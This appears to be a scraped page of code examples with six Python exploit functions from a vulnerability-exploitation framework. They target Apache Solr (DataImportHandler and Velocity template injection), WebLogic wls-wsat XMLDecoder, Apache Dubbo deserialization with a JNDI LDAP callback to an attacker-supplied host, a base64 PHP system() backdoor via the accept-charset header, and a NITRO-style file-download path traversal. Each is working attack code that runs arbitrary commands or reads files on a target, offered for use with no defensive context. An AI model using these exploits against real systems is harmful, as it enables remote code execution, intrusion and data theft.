def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    command = kwargs.get("Command").replace("/", "%2f")
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        session = requests.Session()
        create_session(session, payload_url, proxies, RandomAgent)
        value = get_rand(session, payload_url, proxies, RandomAgent)
        create_session(session, payload_url, proxies, RandomAgent)  # 再次创建连接
        payload = command
        read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            'Content-Type': 'application/xml',
            'X-NITRO-USER': randoms().result(8),
            'X-NITRO-PASS': randoms().result(8),
            'rand_key': value
        }
        data = '<clipermission></clipermission>'
        resp = session.post(url=read_file_payload,
                            headers=headers,
                            timeout=6,
                            data=data,
                            verify=False,
                            proxies=proxies)
        con = resp.text
        ExploitOutput().Banner(OutputData=con)  #回显调用函数
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    command = kwargs.get("Command").replace(' ','+')#对空格进行处理
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
            data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=" + name + "&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(command)
            resp = requests.post(payload_url, data=data2, headers=headers, proxies=proxies, timeout=6, verify=False)

            ExploitOutput().Banner()#无回显调用函数
            _t = VulnerabilityInfo(resp.text)
            Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print("\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m")
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +" || Exploit", e)  # 调用写入类传入URL和错误插件名
Exemplo n.º 3
0
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    command = kwargs.get("Command")
    try:
        payload = "/index.php"
        commandS = ('''system("{}");''').format(command)
        cmd = base64.b64encode(commandS.encode('utf-8'))
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=5,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        ExploitOutput().Banner()  #无回显调用函数
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # 调用写入类传入URL和错误插件名
Exemplo n.º 4
0
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    ExploitUrl = kwargs.get("ExploitUrl")
    try:

        client = DubboClient(url, int(port))

        JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
                                    dataSource="ldap://" + ExploitUrl,
                                    strMatchColumns=["foo"])
        JdbcRowSetImplClass = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
                                  beanClass=JdbcRowSetImplClass,
                                  obj=JdbcRowSetImpl)

        resp = client.send_request_and_return_response(
            service_name=
            'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
            method_name='$invoke',
            args=[toStringBean])
        ExploitOutput().Banner()  #无回显调用函数
        _t = VulnerabilityInfo(str(resp))
        Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # 调用写入类传入URL和错误插件名
Exemplo n.º 5
0
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    command = kwargs.get("Command")

    linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>{}</string>
    </void>
    </array>
    <void method="start"/></void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>'''.format(command)
    windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
              <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                  <void index="0">
                    <string>C:\Windows\System32\cmd.exe</string>
                  </void>
                  <void index="1">
                    <string>/c</string>
                  </void>
                  <void index="2">
                    <string>{}</string>
                  </void>
                </array>
              <void method="start"/></void>
            </java>
          </work:WorkContext>
        </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''.format(command)
    data = ""
    if kwargs.get("OperatingSystem") == "windows":
        data = windows_data
    elif kwargs.get("OperatingSystem") == "linux":
        data = linux_data
    try:
        payload = '/wls-wsat/CoordinatorPortType'
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "text/xml",
        }
        resp = requests.post(payload_url,
                             headers=headers,
                             data=data,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        ExploitOutput().Banner()  #无回显调用函数
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    command = kwargs.get("Command").replace(' ', '+')  #对空格进行处理
    try:
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(
            port) + '/solr/admin/cores'
        step1 = requests.get(payload_url,
                             timeout=6,
                             proxies=proxies,
                             headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/" + name + "/config"
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
                command)
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language':
                'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            resp = requests.post(payload_url1,
                                 data=payload_data,
                                 headers=headers1,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)
            resp2 = requests.get(payload_url2,
                                 headers=headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con2 = resp2.text
            ExploitOutput().Banner(OutputData=con2)  #无回显调用函数
            _t = VulnerabilityInfo(resp.text)
            Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # 调用写入类传入URL和错误插件名